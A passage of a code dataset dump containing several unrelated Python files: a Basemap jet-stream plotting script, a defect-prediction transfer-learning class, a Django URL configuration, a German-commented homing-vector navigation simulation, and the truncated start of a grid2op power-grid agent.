bmp.Basemap(projection=f'{hem[0]}pstere',\n lon_0=0, boundinglat=0,\n resolution='c', round=True)\n\n map_x, map_y = pmap(*np.meshgrid(lon, lat))\n cfill = pmap.contourf(map_x, map_y, uwnd, u_contours,\n cmap='RdBu_r', ax=axes[idx, 1], extend='both')\n\n # Extract the kind for the zonal mean of the first kind (labels[0])\n _umax = dfh[1][dfh[1].kind == labels[1]]\n\n # Draw the parallel (latitude line) for this zonal mean jet location\n # the `latmax` parameter is needed (set to the same latitude) so that\n # the 80deg (N/S) is not drawn as well as the desired jet location\n pmap.drawparallels(_umax[_umax.time == dates[hem]].lat,\n linewidth=2.4, color=cols[labels[1]],\n ax=axes[idx, 1], dashes=[1, 0],\n latmax=_umax[_umax.time == dates[hem]].lat[0])\n\n # Create and 
run an stj_metric.STJPVMetric, don't save,\n # just return lat position\n pv_grad_lat = get_pvgrad_pos(dates[hem])\n\n # Indicies in this array are opposite to this loop's `idx`\n if hem == 'sh':\n hem_idx = 0\n else:\n hem_idx = 1\n\n # Transform the longitude and latitude points of the identified jet\n # to map coords then plot it on pmap\n if pv_grad_lat[hem_idx].ndim != 1:\n pvgrad_map = pmap(lon[:-1:2], pv_grad_lat[hem_idx][0, ::2].values)\n pmap.plot(*pvgrad_map, 'o', color=cols[labels[0]],\n ms=0.9, ax=axes[idx, 1])\n\n _pvgrad = dfh[1][dfh[1].kind == labels[0]]\n pmap.drawparallels(_pvgrad[_pvgrad.time == dates[hem]].lat,\n linewidth=2.4, color=cols[labels[0]],\n ax=axes[idx, 1], dashes=[1, 0],\n latmax=_pvgrad[_pvgrad.time == dates[hem]].lat[0],\n zorder=6)\n\n # Label the map with the selected date, align the title to\n # the right, the padding is set by plt.rcParams['axes.titlepad'],\n # rather than hlightgreyere, for some reason\n axes[idx, 1].set_title(dates[hem].strftime('%b %Y'), loc='right')\n draw_map_lines(pmap, axes[idx, 1])\n\n plot_annotations(fig, axes, cfill)\n plot_labels(fig, figscale)\n plt.savefig('plt_diag_ts_map_{}-{}.{ext}'.format(ext=extn, *in_names))\n\n\nif __name__ == '__main__':\n main(extn='pdf')\n","repo_name":"mkstratos/stj_pv","sub_path":"STJ_PV/compare_runs_map.py","file_name":"compare_runs_map.py","file_ext":"py","file_size_in_byte":9700,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"14220513029","text":"from Utils.classlib import *\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.model_selection import train_test_split\nfrom imblearn.over_sampling import SMOTE\nfrom Algorithms.Classifier import *\nfrom sklearn.ensemble import AdaBoostClassifier\n\nfrom sklearn.metrics import roc_auc_score, accuracy_score\n\n\nclass DTB(object):\n def __init__(self, Xs, Ys, Xt, Yt, n_neighbors=10, iter=20, clf='RF',\n n_estimators=10, criterion='gini', max_features='auto', RFmin_samples_split=2, # RF\n Boostnestimator=50, BoostLearnrate=1, # Boost\n CARTsplitter='best', # CART\n Ridgealpha=1, Ridgenormalize=False, # Ridge\n NBtype='gaussian',\n SVCkernel='poly', C=1, degree=3, coef0=0.0, SVCgamma=1\n ):\n self.Xsource = np.asarray(Xs)\n self.Ysource = np.asarray(Ys)\n self.Xtarget = np.asarray(Xt)\n self.Ytarget = np.asarray(Yt)\n self.n_neighbors = int(n_neighbors)\n self.iter = iter\n self.clfType = clf\n\n self.n_estimators = n_estimators\n self.criterion = criterion\n self.max_features = max_features\n self.RFmin_samples = RFmin_samples_split\n self.Boostne = Boostnestimator\n self.BoostLearnrate = BoostLearnrate\n self.NBType = NBtype\n self.CARTsplitter = CARTsplitter\n self.Ridgealpha = Ridgealpha\n self.Ridgenormalize = Ridgenormalize\n self.SVCkernel = SVCkernel\n self.coef0 = coef0\n self.gamma = SVCgamma\n self.degree = degree\n self.C = C\n\n\n\n def _NNfilter(self):\n knn = NearestNeighbors()\n knn.fit(self.Xsource)\n data = []\n ysel = []\n\n for item in self.Xtarget:\n tmp = knn.kneighbors(item.reshape(1, -1), self.n_neighbors, return_distance=False)\n tmp = tmp[0]\n for i in tmp:\n if list(self.Xsource[i]) not in data:\n data.append(list(self.Xsource[i]))\n ysel.append(self.Ysource[i])\n self.Xsource = np.asanyarray(data)\n self.Ysource = np.asanyarray(ysel)\n\n # oversample for minor part\n def _SMOTE(self):\n smote = SMOTE()\n self.Xsource, self.Ysource = smote.fit_resample(self.Xsource, self.Ysource)\n\n def _max_min(self, x):\n shape = 
np.asarray(x).shape\n Max = np.zeros(shape[1])\n Min = np.zeros(shape[1])\n for i in range(0, shape[1]):\n a = x[:, i]\n Max[i] = np.max(a)\n Min[i] = np.min(a)\n\n return Max, Min\n\n def _weight(self):\n max, min = self._max_min(self.Xtarget)\n shape = self.Xsource.shape\n s = np.zeros(shape[0])\n w = np.zeros(shape[0])\n for i in range(0,shape[0]):\n tmp = 0\n for j in range(0, shape[1]):\n if self.Xsource[i][j] <= max[j] and self.Xsource[i][j] >= min[j]:\n tmp = tmp + 1\n s[i] = tmp\n w[i] = s[i] / (1.0 * np.power(shape[1] - s[i] + 1, 2))\n\n return w\n\n def fit(self):\n self._NNfilter()\n self._SMOTE()\n weight = self._weight()\n\n trainX, self.testX, trainY, self.testY = train_test_split(self.Xtarget, self.Ytarget, test_size=0.3)\n while len(np.unique(self.testY)) <= 1:\n trainX, testX, trainY, self.testY = train_test_split(self.Xtarget, self.Ytarget, test_size=0.3)\n if self.clfType == 'RF':\n m = RandomForestClassifier(n_estimators=self.n_estimators, criterion=self.criterion,\n max_features=self.max_features, min_samples_split=self.RFmin_samples)\n if self.clfType == 'SVM':\n m = SVC(kernel=self.SVCkernel, C=self.C, degree=self.degree, coef0=self.coef0, gamma=self.gamma)\n if self.clfType == 'Boost':\n m = AdaBoostClassifier(n_estimators=self.Boostne, learning_rate=self.BoostLearnrate)\n if self.clfType == 'NB':\n if self.NBType == 'gaussian':\n m = GaussianNB()\n elif self.NBType == 'multinomial':\n m = MultinomialNB()\n elif self.NBType == 'bernoulli':\n m = BernoulliNB()\n if self.clfType == 'CART':\n m = DecisionTreeClassifier(criterion=self.criterion, splitter=self.CARTsplitter, max_features=self.max_features, min_samples_split=self.RFmin_samples)\n if self.clfType == 'Ridge':\n m = RidgeClassifier(alpha=self.Ridgealpha, normalize=self.Ridgenormalize)\n\n # self.model = trAdaBoost(self.Xsource, trainX, self.Ysource, trainY, testX, self.iter, initWeight=weight, clf=m)\n self.model = AdaBoostClassifier(base_estimator=m, n_estimators=self.iter, algorithm='SAMME')\n self.model.fit(self.Xsource, self.Ysource, sample_weight=weight)\n\n\n def predict(self):\n # if self.model.error == 1 or len(np.unique(self.testY)) <= 1:\n # self.AUC = 0\n # return\n Ypredict = self.model.predict(self.testX)\n\n self.AUC = roc_auc_score(self.testY, Ypredict)\n self.acc = accuracy_score(self.testY, Ypredict)\n","repo_name":"COLA-Laboratory/icse2020","sub_path":"code/Algorithms/DTB.py","file_name":"DTB.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"5749743379","text":"\"\"\"\npath('qcontrols/create', qcontrol.CreateQcontrol.as_view() ,name='create_qcontrol'),\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.views.generic.detail import DetailView\n\nfrom prod.models.preprod import Preprod\nfrom prod.models.qcontrol import Qcontrol\nfrom prod.models.rejprod import Rejprod\nfrom .views import home,preprod,qcontrol,rejprod\n\nurlpatterns = [\n path('', home.index,name='hello'),\n path('preprods', preprod.preprod_liste ,name='preprods'),\n path('preprods/create', preprod.CreatePreprod.as_view() ,name='create_preprod'),\n path('preprods/update/<int:pk>', preprod.UpdatePreprod.as_view() ,name='update_preprod'),\n path('preprods/<int:pk>',\n DetailView.as_view(model=Preprod, template_name=\"prod/preprod/preprod_detail.html\"),\n name='detail_preprod'),\n path('qcontrols', qcontrol.qcontrol_liste ,name='qcontrols'),\n path('qcontrols/update/<int:pk>', 
qcontrol.UpdateQcontrol.as_view() ,name='update_qcontrol'),\n path('qcontrols/<int:pk>',\n DetailView.as_view(model=Qcontrol, template_name=\"prod/qcontrol/qcontrol_detail.html\"),\n name='detail_qcontrol'),\n path('rejprods', rejprod.rejprod_liste ,name='rejprods'),\n path('rejprods/create', rejprod.CreateRejprod.as_view() ,name='create_rejprod'),\n path('rejprods/update/<int:pk>', rejprod.UpdateRejprod.as_view() ,name='update_rejprod'),\n path('rejprods/<int:pk>',\n DetailView.as_view(model=Rejprod, template_name=\"prod/rejprod/rejprod_detail.html\"),\n name='detail_rejprod'),\n]","repo_name":"faical2020/faical2020","sub_path":"rejet/prod/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10663541983","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom numpy.core.shape_base import vstack\nfrom sys import exit\n\n#Initialisieren der Landmarks\nLM1 = [3.5, 2]\nLM2 = [3.5, -2]\nLM3 = [ 0, -4]\nLMR = 0.5 #Radius der Landmarks\n\n'''\n Definiert die Flächen eine Snapshot/ einer Retina-Abbildung (Circle) als 2 Punkte \n und die Rotationswinkel im Bogenmaß zur Mitte beider Punkte.\n Der Mittelpunkt des Kreises wird bei der Berechnung des \n Mittelpunktes der Fläche verwendet.\n'''\nclass Area(object):\n def __init__(self, p1, p2, circlecenter):\n self.p1 = p1\n self.p2 = p2\n\n theta = polarConverter2(p1, p2, circlecenter)\n self.center = (theta[0] + ((theta[1]-theta[0])/2)) % (2*math.pi)\n def __repr__(self) -> str:\n return str(self.p1) + \" | \" + str(self.p2) + \" | \" + str(self.center)\n def __eq__(self, o: object) -> bool:\n return self.p1 == object.p1 and self.p2 == object.p2 and self.center == object.center\n\n\n'''\n Definiert den Kreis eines Snapshots/einer Retina-Abbildung\n als eine Liste von Flächen, gegenübergesetzten Flächen und\n der Mittepunkt des Kreises \n'''\nclass Circle(object):\n def __init__(self, areas, center):\n self.center = center\n self.areas = []\n self.op_areas = []\n # Sort Areas\n theta = []\n order = list(range(len(areas)))\n for a in areas:\n theta.append( polarConverter(a, center)[0])\n for t in theta:\n for i in theta:\n if t > i:\n temp = t\n t = i\n i = temp\n for o in order:\n self.areas.append(areas[o])\n # Calculate oposite areas\n if len(self.areas) == 3:\n self.op_areas.append(Area(self.areas[0].p2, self.areas[2].p1, center))\n self.op_areas.append(Area(self.areas[2].p2, self.areas[1].p1, center))\n self.op_areas.append(Area(self.areas[1].p2, self.areas[0].p1, center))\n if len(self.areas) == 2:\n self.op_areas.append(Area(self.areas[0].p1, self.areas[1].p2, center))\n self.op_areas.append(Area(self.areas[1].p1, self.areas[0].p2, center))\n if len(self.areas) == 1:\n self.op_areas.append(Area(self.areas[0].p2, self.areas[0].p1, center))\n\n'''\n Mathematische Funktionen zur Bearbeitung von Vektoren (hier: orthogonale Rotation und Längenberechnung)\n'''\n# Vector Rotation\ndef rotateVector2DClockwise(vector):\n return np.array([vector[1], -vector[0]])\ndef rotateVector2DCounterClockwise(vector):\n return np.array([-vector[1], vector[0]])\ndef vector2DLenght(vector):\n return math.sqrt(vector[0]**2 + vector[1]**2)\n\n#Skalarprodukt\ndef skalar(u, v):\n return u[0]*v[0]+u[1]*v[1]\n\n'''\n Gibt die Fläche zurück, die durch ein Landmark auf einen Kreis mit gegebenem Radius \n projiziert wird. 
Dessen Mittelpunkt liegt auf middle.\n'''\ndef calculateArea(lm, middle, radius):\n #Convert to numpy Arrays (Vectors)\n lm = np.array(lm)\n middle = np.array(middle)\n M_LM = lm - middle # vector mitte zu LM\n M_LMR = rotateVector2DClockwise(M_LM) #vector mitte zu LM rotiert\n M_LMR_05 = M_LMR / (2 * vector2DLenght(M_LMR)) # Vektor durch Länge teilen, dann anpassen (mit *2) wegen r=0.5 von LM\n M_LM_EDGE0 = M_LM + M_LMR_05 # raender von LM1 \n M_LM_EDGE1 = M_LM - M_LMR_05 # andere ^\n M_LM_EDGE0_P1 = (M_LM_EDGE0 / vector2DLenght(M_LM_EDGE0)) * radius #center zu schnittpunkt Kreis Rand1\n M_LM_EDGE1_P2 = (M_LM_EDGE1 / vector2DLenght(M_LM_EDGE1)) * radius # ^ andere\n return Area(middle + M_LM_EDGE0_P1, middle +M_LM_EDGE1_P2, middle)\n\n'''\n Beide Funktionen geben die Rotation im Bogenmass ’Theta' der beiden Punkte\n die einen Fläche bilden zurück. Verwendet wird der Mittelpunkt des Kreises middle für die Berechnung.\n'''\ndef polarConverter(area, middle):\n theta = [0,0]\n theta[0] = math.atan2(area.p1[1] - middle[1], area.p1[0] - middle[0])\n theta[1] = math.atan2(area.p2[1] - middle[1], area.p2[0] - middle[0]) \n\n if theta[0] < 0:\n theta[0] += 2*(math.pi)\n if theta[1] < 0:\n theta[1] += 2*(math.pi) \n if theta[0] > theta[1]:\n theta[1] += 2*(math.pi)\n\n return theta\ndef polarConverter2(p1, p2, middle):\n theta = [0,0]\n theta[0] = math.atan2(p1[1] - middle[1], p1[0] - middle[0])\n theta[1] = math.atan2(p2[1] - middle[1], p2[0] - middle[0]) \n\n if theta[0] < 0:\n theta[0] += 2*(math.pi) \n if theta[1] < 0:\n theta[1] += 2*(math.pi) \n if theta[0] > theta[1]:\n theta[1] += 2*(math.pi)\n\n return theta\ndef polarConverter3(punkt, middle):\n return math.atan2(punkt[1]-middle[1], punkt[0]-middle[0])\n'''\n Funktion zur Bestimmung, ob sich zwei gegebene Flächen überlappen.\n middle ist der Mittelpunkt des Kreises, zu dem die Flächen gehören.\n'''\ndef areaOverlap(area1, area2, middle):\n # Polar Coordinates\n angles = [[0,0],[0,0]]\n angles[0] = polarConverter(area1, middle)\n angles[1] = polarConverter(area2, middle)\n\n # a1.p1 in a2\n a = (angles[0][0] >= angles[1][0] and angles[0][0] <= angles[1][1]) \n # a1.p2 in a2\n b = (angles[0][1] >= angles[1][0] and angles[0][1] <= angles[1][1]) \n # a2.p1 in a1\n c = (angles[1][0] >= angles[0][0] and angles[1][0] <= angles[0][1])\n # a2.p2 in a1\n d = (angles[1][1] >= angles[0][0] and angles[1][1] <= angles[0][1])\n \n return a or b or c or d\n\n'''\n Gibt einen Circle zurück, der eine Retina-Abbildung oder einen Snapshot repräsentiert, mit einem Mittelpunkt middle und einem gegebenen Radius radius.\n Bei der Berechnung der entsprechenden Flächen wird geprüft, ob sich Flächen überlappen und verbindet sie automatisch, wenn dies der Fall ist. 
\n'''\ndef takeSnapshot(middle, radius):\n areas = [] # Real Projected areas\n valid_areas = [] # Joined reduced areas\n \n #Calculate Areas\n areas.append(calculateArea(LM1, middle, radius))\n areas.append(calculateArea(LM2, middle, radius))\n areas.append(calculateArea(LM3, middle, radius))\n \n # Calculate the rotation degrees in radians of the points of all the areas projected by the landmarks\n theta = [0 for x in range(6)] \n for i in range(0, 3):\n theta[i*2] = math.atan2(areas[i].p1[1]- middle[1], areas[i].p1[0]- middle[0])\n theta[i*2 + 1] = math.atan2(areas[i].p2[1]- middle[1], areas[i].p2[0]- middle[0])\n \n if theta[i*2] < 0:\n theta[i*2] += 2*(math.pi)\n \n if theta[i*2 + 1] < 0:\n theta[i*2 + 1] += 2*(math.pi)\n \n if theta[i*2] > theta[i*2 + 1]:\n theta[i*2 + 1] += 2*(math.pi)\n\n area1 = True\n area2 = True\n area3 = True\n # Überprüfen mit areaOverlap ob es Überlappungen gibt und verwenden von theta, um zu bestimmen, wie die verbunden werden sollen.\n if (areaOverlap(areas[0], areas[1], middle) and areaOverlap(areas[1], areas[2], middle)) or (areaOverlap(areas[0], areas[2], middle) and areaOverlap(areas[2], areas[1], middle)):\n area1 = False\n area2 = False\n area3 = False\n index_min = 0\n index_max = 0\n for x in theta:\n if x == min(theta):\n break\n index_min += 1\n for x in theta:\n if x == max(theta):\n break\n index_max += 1\n valid_areas.append(Area(areas[int(index_min/2)].p1, areas[int(index_max/2)].p2, middle))\n else:\n if areaOverlap(areas[0], areas[1], middle):\n area1 = False\n area2 = False\n # A1 innerhalb von a A2\n if (theta[0] >= theta[2] and theta[0] <= theta[3]) and (theta[1] >= theta[2] and theta[1] <= theta[3]):\n valid_areas.append(areas[1])\n # A2 innerhalb von a A1\n elif (theta[2] >= theta[0] and theta[2] <= theta[1]) and (theta[3] >= theta[0] and theta[3] <= theta[1]):\n valid_areas.append(areas[0])\n # A1 rechts von A2 a1.p1 zb. a2 | a2.p1 -> a1.p2\n elif theta[0] >= theta[2] and theta[0] <= theta[3]:\n valid_areas.append(Area(areas[1].p1, areas[0].p2, middle))\n # A1 links von A2 a1.p2 zb. a2\n elif theta[1] >= theta[2] and theta[1] <= theta[3]:\n valid_areas.append(Area(areas[0].p1, areas[1].p2, middle))\n #print(\"Overlap A1-A2\")\n if areaOverlap(areas[0], areas[2], middle):\n area1 = False\n area3 = False\n # A1 innerhalb von a A3\n if (theta[0] >= theta[4] and theta[0] <= theta[5]) and (theta[1] >= theta[4] and theta[1] <= theta[5]):\n valid_areas.append(areas[2])\n # A3 innerhalb von a A1\n elif (theta[4] >= theta[0] and theta[4] <= theta[1]) and (theta[5] >= theta[0] and theta[5] <= theta[1]):\n valid_areas.append(areas[0])\n # A1 rechts von A3 a1.p1 zb. a3 | a2.p1 -> a1.p2\n elif theta[0] >= theta[4] and theta[0] <= theta[5]:\n valid_areas.append(Area(areas[2].p1, areas[0].p2, middle))\n # A1 links von A3 a1.p2 zb. a3\n elif theta[1] >= theta[4] and theta[1] <= theta[5]:\n valid_areas.append(Area(areas[0].p1, areas[2].p2, middle))\n #print(\"Overlap A1-A3\")\n if areaOverlap(areas[1], areas[2], middle):\n area2 = False\n area3 = False\n # A3 innerhalb von a A2\n if (theta[4] >= theta[2] and theta[4] <= theta[3]) and (theta[5] >= theta[2] and theta[5] <= theta[3]):\n valid_areas.append(areas[1])\n # A2 innerhalb von a A3\n elif (theta[2] >= theta[4] and theta[2] <= theta[5]) and (theta[3] >= theta[4] and theta[3] <= theta[5]):\n valid_areas.append(areas[2])\n # A3 rechts von A2 a1.p1 zb. 
a2 | a2.p1 -> a1.p2\n elif theta[4] >= theta[2] and theta[4] <= theta[3]:\n valid_areas.append(Area(areas[1].p1, areas[2].p2, middle))\n # A3 links von A2 a1.p2 zb. a2\n elif theta[5] >= theta[2] and theta[5] <= theta[3]:\n valid_areas.append(Area(areas[2].p1, areas[1].p2, middle))\n #print(\"Overlap A2-A3\")\n if area1:\n valid_areas.append(areas[0])\n if area2:\n valid_areas.append(areas[1])\n if area3:\n valid_areas.append(areas[2])\n \n return Circle(valid_areas, middle) \n\n# Main\n'''\nSnapshot wird bei Startpunkt [0, 0] initialisiert\n'''\nsnapshot = takeSnapshot(np.array([0,0]), 1)\n\n'''\nMenü mit drei Auswahlmöglichkeiten öffnet sich für den Benutzer.\n'''\nwhile True: \n #Plot wird eine Größe zugeordnet\n fig, ax = plt.subplots(figsize = (7,7))\n \n print(\"\\nBitte wählen Sie einen Option: \\n(Erwartete eingaben: '1' '2' '0')\")\n print(\"1. Einen Homing-Vektor ausgeben\")\n print(\"2. Alle Homing-Vektoren ausgeben\")\n print(\"0. Programm beenden\\n\")\n while True:\n try:\n eingabe = int(input())\n except:\n eingabe = 3\n if eingabe != 1 or eingabe != 2 or eingabe != 0:\n break\n else:\n print(\"Falsches Eingabe! Bitte versuchen Sie es erneut.\")\n if eingabe == 0:\n exit()\n elif eingabe == 1:\n while True:\n print(\"Nur Koordinaten im bereich [-7;7] sind erlaubt\")\n print(\"Bitte geben Sie Ihre x-Koordinate ein:\")\n try: \n x_coord = int(input())\n print(\"Bitte geben Sie Ihre y-Koordinate ein:\")\n y_coord = int(input())\n except :\n continue\n\n if ((x_coord >= -7 and x_coord <= 7) and (y_coord >= -7 and y_coord <= 7)) or\\\n ((x_coord != 0 and y_coord != 0) or (x_coord != LM1[0] and y_coord != LM1[1]) or\\\n (x_coord != LM2[0] and y_coord != LM2[1]) or (x_coord != LM3[0] and y_coord != LM3[1])):\n break\n else:\n print(\"Falsche Eingabe! 
Bitte versuchen Sie es erneut.\")\n #print('X: ' + str(j-7) + \" | Y: \" + str(l-7))\n \n '''\n Retina-Abbildung wird bei den gegebenen Koordinaten erstellt.\n '''\n retina = takeSnapshot(np.array([x_coord, y_coord]), 2)\n \n '''\n Rotations- und Translations-Vektoren werden durch Zuordnung und Vergleich der Flächen bestimmt.\n '''\n rotation_vectors = []\n translation_vectors = []\n # Berechnen des Rotations- und Translationsvektor jedes Snapshot-Fläche und seiner gepaarten Retina-Fläche \n for s_area in snapshot.areas:\n abstand = []\n pair = 0\n #Retina-Abbildungsflächen werden den passenden Snapshot-Flächen zugeordnet\n for r_area in retina.areas:\n berechnung = abs(s_area.center - r_area.center)\n \n if (berechnung > (math.pi)):\n berechnung = (2*math.pi - berechnung)\n abstand.append(abs(berechnung))\n \n if (abs(berechnung)) == min(abstand):\n pair = r_area\n \n # Rotationsvektoren werden erstellt\n if s_area.center < pair.center:\n #print(r_area.center)\n rotation_vectors.append(rotateVector2DClockwise([math.cos(pair.center), math.sin(pair.center)]))\n elif s_area.center > pair.center:\n rotation_vectors.append(rotateVector2DCounterClockwise([math.cos(pair.center), math.sin(pair.center)]))\n else:\n rotation_vectors.append(np.array([0,0]))\n \n # Translationsvektoren werden erstellt\n # Breite der Areas berechnen\n # Breiten vergleichen\n # if b_s < b_r : nach innen\n # if b_s > b_r : nach außen\n # else [0,0]\n polar_s = polarConverter2( s_area.p1, s_area.p2, snapshot.center)\n polar_r = polarConverter2( pair.p1, pair.p2, retina.center)\n breite_s = polar_s[1] - polar_s[0] \n breite_r = polar_r[1] - polar_r[0]\n if breite_s < breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)])*-1 )\n elif breite_s > breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)]))\n else:\n translation_vectors.append(np.array([0,0]))\n\n # Berechnen der \"opposite\"-Vektoren mit denselben Methoden\n for s_area in snapshot.op_areas:\n abstand = []\n pair = 0\n #\"Opposite\"-Flächen des Snapshots werden nun mit den entsprechenden Retina-\"Opposite\"-Flächen zusammengepaart.\n for r_area in retina.op_areas:\n berechnung = abs(s_area.center - r_area.center)\n \n if (berechnung > (math.pi)):\n berechnung = (2*math.pi - berechnung)\n abstand.append(abs(berechnung))\n \n if (abs(berechnung)) == min(abstand):\n pair = r_area \n # Rotation Vektoren \n if s_area.center < pair.center:\n rotation_vectors.append(rotateVector2DClockwise([math.cos(pair.center), math.sin(pair.center)]))\n elif s_area.center > pair.center:\n rotation_vectors.append(rotateVector2DCounterClockwise([math.cos(pair.center), math.sin(pair.center)]))\n else:\n rotation_vectors.append(np.array([0,0]))\n # Translation Vektoren\n # Breite der Areas berechnen\n # Breiten vergleichen\n # if b_s < b_r : nach innen\n # if b_s > b_r : nach außen\n # else [0,0]\n polar_s = polarConverter2( s_area.p1, s_area.p2, snapshot.center)\n polar_r = polarConverter2( pair.p1, pair.p2, retina.center)\n breite_s = polar_s[1] - polar_s[0] \n breite_r = polar_r[1] - polar_r[0]\n if breite_s < breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)])*-1 )\n elif breite_s > breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)]))\n else:\n translation_vectors.append(np.array([0,0]))\n\n # Alle Rotations- und Translationsvektoren werden zusammengefügt.\n vt = np.array([0,0])\n vp = np.array([0,0])\n for x in 
rotation_vectors:\n vt = vt + x\n for x in translation_vectors:\n vp = vp + x\n\n '''\n Homing-Vektor ergibt sich aus vt + vp*3\n '''\n v = vt + (3 * vp) \n \n nullpunkt_v = -(retina.center)\n thetaDiff = abs(polarConverter3(v, retina.center) - polarConverter3(nullpunkt_v, retina.center))\n avg_diff = np.rad2deg(thetaDiff)\n if (avg_diff > 180):\n avg_diff = 360 - avg_diff\n \n print(\"Abweichung in Grad: \" + str(avg_diff))\n print(\"V = \" + str(v)) #Ausgabe des Homing-Vektors\n \n '''\n Quiver-Plot wird erstellt\n '''\n ax.quiver(retina.center[0], retina.center[1], v[0], v[1])\n ax.set_title('ATS - Snapshotmodel')\n plt.show()\n\n elif eingabe == 2:\n #Für jede Koordinate von [-7;-7] bis [7;7] wird ein Homing-Vektor erstellt\n avg_diff_arr = [] # zur Bestimmung der Durchschnittsabweichung der Homing-Vektoren in Grad\n \n for j in range(15):\n for l in range(15):\n # Homing-Vektoren werden NICHT bei der Snapshot-Koordinate [0;0] oder bei den Landmarks erstellt.\n if ((j-7) == 0 and (l-7) == 0) or ((j-7) == LM1[0] and (l-7) == LM1[1]) or ((j-7) == LM2[0] and (l-7) == LM2[1]) or ((j-7) == LM3[0] and (l-7) == LM3[1]): \n continue\n \n '''Retina-Abbildung wird mit den entsprechenden Koordinaten erstellt.'''\n retina = takeSnapshot(np.array([j-7, l-7]), 2)\n \n '''\n Rotations- und Translations-Vektoren werden durch Zuordnung und Vergleich der Flächen bestimmt.\n '''\n rotation_vectors = []\n translation_vectors = []\n \n for s_area in snapshot.areas:\n abstand = []\n pair = 0\n #Retina-Abbildungsflächen werden den passenden Snapshot-Flächen zugeordnet\n for r_area in retina.areas:\n berechnung = abs(s_area.center - r_area.center)\n \n if (berechnung > (math.pi)):\n berechnung = (2*math.pi - berechnung)\n abstand.append(abs(berechnung))\n \n if (abs(berechnung)) == min(abstand):\n pair = r_area\n \n # Bestimmung der Rotationsvektoren\n if s_area.center < pair.center:\n #print(r_area.center)\n rotation_vectors.append(rotateVector2DClockwise([math.cos(pair.center), math.sin(pair.center)]))\n elif s_area.center > pair.center:\n rotation_vectors.append(rotateVector2DCounterClockwise([math.cos(pair.center), math.sin(pair.center)]))\n else:\n rotation_vectors.append(np.array([0,0]))\n # Determine Translation Vector\n # Breite der Areas berechnen\n # Breiten vergleichen\n # if b_s < b_r : nach innen\n # if b_s > b_r : nach außen\n # else [0,0]\n polar_s = polarConverter2( s_area.p1, s_area.p2, snapshot.center)\n polar_r = polarConverter2( pair.p1, pair.p2, retina.center)\n breite_s = polar_s[1] - polar_s[0] \n breite_r = polar_r[1] - polar_r[0]\n if breite_s < breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)])*-1 )\n elif breite_s > breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)]))\n else:\n translation_vectors.append(np.array([0,0]))\n\n # \"Opposite\"-Flächen des Snapshots werden nun mit den entsprechenden Retina-\"Opposite\"-Flächen zusammengepaart.\n for s_area in snapshot.op_areas:\n abstand = []\n pair = 0\n # Find pair\n for r_area in retina.op_areas:\n berechnung = abs(s_area.center - r_area.center)\n \n if (berechnung > (math.pi)):\n berechnung = (2*math.pi - berechnung)\n abstand.append(abs(berechnung))\n \n if (abs(berechnung)) == min(abstand):\n pair = r_area \n \n # Bestimmung der Rotationsvektoren\n if s_area.center < pair.center:\n rotation_vectors.append(rotateVector2DClockwise([math.cos(pair.center), math.sin(pair.center)]))\n elif s_area.center > pair.center:\n 
rotation_vectors.append(rotateVector2DCounterClockwise([math.cos(pair.center), math.sin(pair.center)]))\n else:\n rotation_vectors.append(np.array([0,0]))\n \n # Bestimmung der Translationsvektoren\n polar_s = polarConverter2( s_area.p1, s_area.p2, snapshot.center)\n polar_r = polarConverter2( pair.p1, pair.p2, retina.center)\n breite_s = polar_s[1] - polar_s[0] \n breite_r = polar_r[1] - polar_r[0]\n if breite_s < breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)])*-1 )\n elif breite_s > breite_r:\n translation_vectors.append(np.array([math.cos(pair.center), math.sin(pair.center)]))\n else:\n translation_vectors.append(np.array([0,0]))\n\n # Alle Rotations- und Translationsvektoren werden zusammengefügt.\n vt = np.array([0,0])\n vp = np.array([0,0])\n for x in rotation_vectors:\n vt = vt + x\n for x in translation_vectors:\n vp = vp + x\n\n '''\n Homing-Vektor ergibt sich aus vt + vp*3\n '''\n v = vt + (3 * vp)\n \n nullpunkt_v = -(retina.center)\n thetaDiff = abs(polarConverter3(v, retina.center) - polarConverter3(nullpunkt_v, retina.center))\n \n avg_diff = np.rad2deg(thetaDiff)\n if (avg_diff > 180):\n avg_diff = 360 - avg_diff\n \n avg_diff_arr.append(avg_diff)\n \n #print(str(avg_diff) + \" | Koordinaten (\" + str(retina.center) + \")\")\n \n '''\n Quiver-Plot wird erstellt\n '''\n ax.quiver(retina.center[0], retina.center[1], v[0], v[1])\n #Displaying the plot\n \n print(str(np.average(avg_diff_arr)) + \" => Durchschnittliche Abweichung in Grad\")\n ax.set_title('ATS - Snapshotmodel')\n plt.show()","repo_name":"1x5x7/THK-ATS-HomingVectors","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23871,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32436692598","text":"import numpy as np\nfrom grid2op.Agent import BaseAgent\nfrom grid2op.Observation import BaseObservation\nfrom grid2op.Action import ActionSpace\nfrom grid2op.Exceptions import AgentError\n\n\nclass RecoPowerlinePerArea(BaseAgent):\n \"\"\"This class acts like the :class:`RecoPowerlineAgent` but it is able\n to reconnect multiple lines at the same steps (one line per area).\n \n The \"areas\" are defined by a list of list of substation id provided as input.\n\n Of course the area you provide to the agent should be the same as the areas\n used in the rules of the game. Otherwise, the agent might try to reconnect\n two powerline \"in the same area for the environment\" which of course will\n lead to an illegal action.\n\n You can use it like:\n \n .. 
